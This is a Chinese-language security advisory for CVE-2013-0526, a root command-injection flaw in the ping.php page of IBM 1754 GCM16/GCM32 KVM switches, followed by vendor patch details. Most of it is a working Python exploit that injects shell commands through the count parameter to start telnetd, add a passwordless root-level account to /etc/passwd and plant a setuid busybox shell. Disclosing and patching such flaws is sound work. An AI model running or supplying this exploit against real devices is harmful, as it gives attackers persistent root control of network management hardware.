发布日期:2013-08-16
更新日期:2013-08-20
受影响系统:
IBM IBM 1754 GCM GCM32
IBM IBM 1754 GCM GCM16
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 61816
CVE(CAN) ID: CVE-2013-0526
IBM 1754 GCM 系列在单一设备中提供了经由 IP 的 KVM 和串行控制台管理技术。
IBM 1754 GCM16 Global Console Manager 1.18.0.22011、IBM 1754 GCM32 Global Console Manager 1.18.0.22011存在多个命令执行漏洞,成功利用这些漏洞后可导致攻击者用root权限执行任意命令。此漏洞源于webapp变量没有被正确过滤。ping.php里的$count及$size参数允许创建特制的URL,注入文本到exec(),在嵌入KVM的Linux上执行任意命令。
<*来源:Alejandro Alvarez Bravo
链接:
?lndocid=MIGR-5093509
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
from StringIO import StringIO
import pycurl
import re
sessid = "XXXXXXXXX"
target = "https://ip.of.kvm/ping.php" <https://172.30.30.40/ping.php>
command = "/sbin/telnetd ; echo superb::0:0:owned:/:/bin/sh >> /etc/passwd
; cp /bin/busybox /tmp/su ; chmod 6755 /tmp/su ; echo done. now connect to
device using telnet with user target and pass target, then \"/tmp/su -
superb\""
storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, target)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.POSTFIELDS, 'address=255.255.255.255&action=ping&size=56&count=1
; echo *E* ; ' + command + ' ; echo *E*')
c.setopt(c.COOKIE,'avctSessionId=' + sessid)
try:
c.perform()
c.close()
except:
print ""
content = storage.getvalue()
x1 = re.search(r"\*E\*(.*)\*E\*",content)
print x1.group(1).replace("<br />","\n")
建议:
--------------------------------------------------------------------------------
厂商补丁:
IBM
---
IBM已经为此发布了一个安全公告(MIGR-5093509)以及相应补丁:
MIGR-5093509:IBM GCM16 KVM Switch Remote Command Execution (CVE-2013-0526)
链接:?lndocid=MIGR-5093509